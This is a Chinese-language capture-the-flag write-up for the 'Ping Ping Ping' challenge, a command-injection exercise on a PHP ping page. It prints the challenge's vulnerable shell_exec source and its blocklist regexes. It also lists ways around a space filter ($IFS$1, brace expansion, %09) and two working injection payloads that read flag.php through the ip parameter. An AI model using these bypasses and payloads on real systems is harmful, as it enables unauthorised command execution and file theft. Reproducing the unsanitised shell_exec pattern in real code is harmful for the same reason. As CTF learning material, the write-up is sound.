[GXYCTF2019]Ping Ping Ping
看样子是命令执行,然后试了一下,发现过滤了挺多的字符的,过滤了||,还有空格,还有*,试了各种绕过就是不行,一直报字符,离谱,有个总结的绕过空格的,试试,好吧,把{}也绕过了,然后$IFS$1可以
$IFS
${IFS}
$IFS$1 //$1改成$加其他数字都行
<
<>
{cat,flag.php} //用逗号实现了空格功能
%20
%09
直接;这样都可以执行命令???好吧,我以为必须&&或者||呢,然后看到这个下面的东西,flag.php然后是index.php,直接cat,flag被过滤了,我试试大小写,也不行,还是看看源码吧,很烦
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "
";
print_r($a);
}
?>
无情啊,这是只要有flag这几个字母顺序,就会被堵住,想想
第一种,变量覆盖
?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
第二种,将结果作为参数(不知道为啥,|管道符不能让cat来执行不懂,为什么呢)搜了一下
cat、sort、uniq、grep等命令均支持管道符,是因为这些命令均可从标准输入中读取要处理的文本(即从标准输入中读取参数);
而对于部分命令,例如rm、kill等命令则不支持从标准输入中读取参数,只支持从命令行中读取参数(即rm命令后面必须指定删除的文件或者目录,kill命令后面必须要指定杀死的进程号等)
一般情况下,处理文本的命令,例如sort、uniq、grep、awk、sed等命令均支持管道;像rm、ls这类的不是处理文本的命令均不支持管道
?ip=127.0.0.1;cat$IFS$1`ls`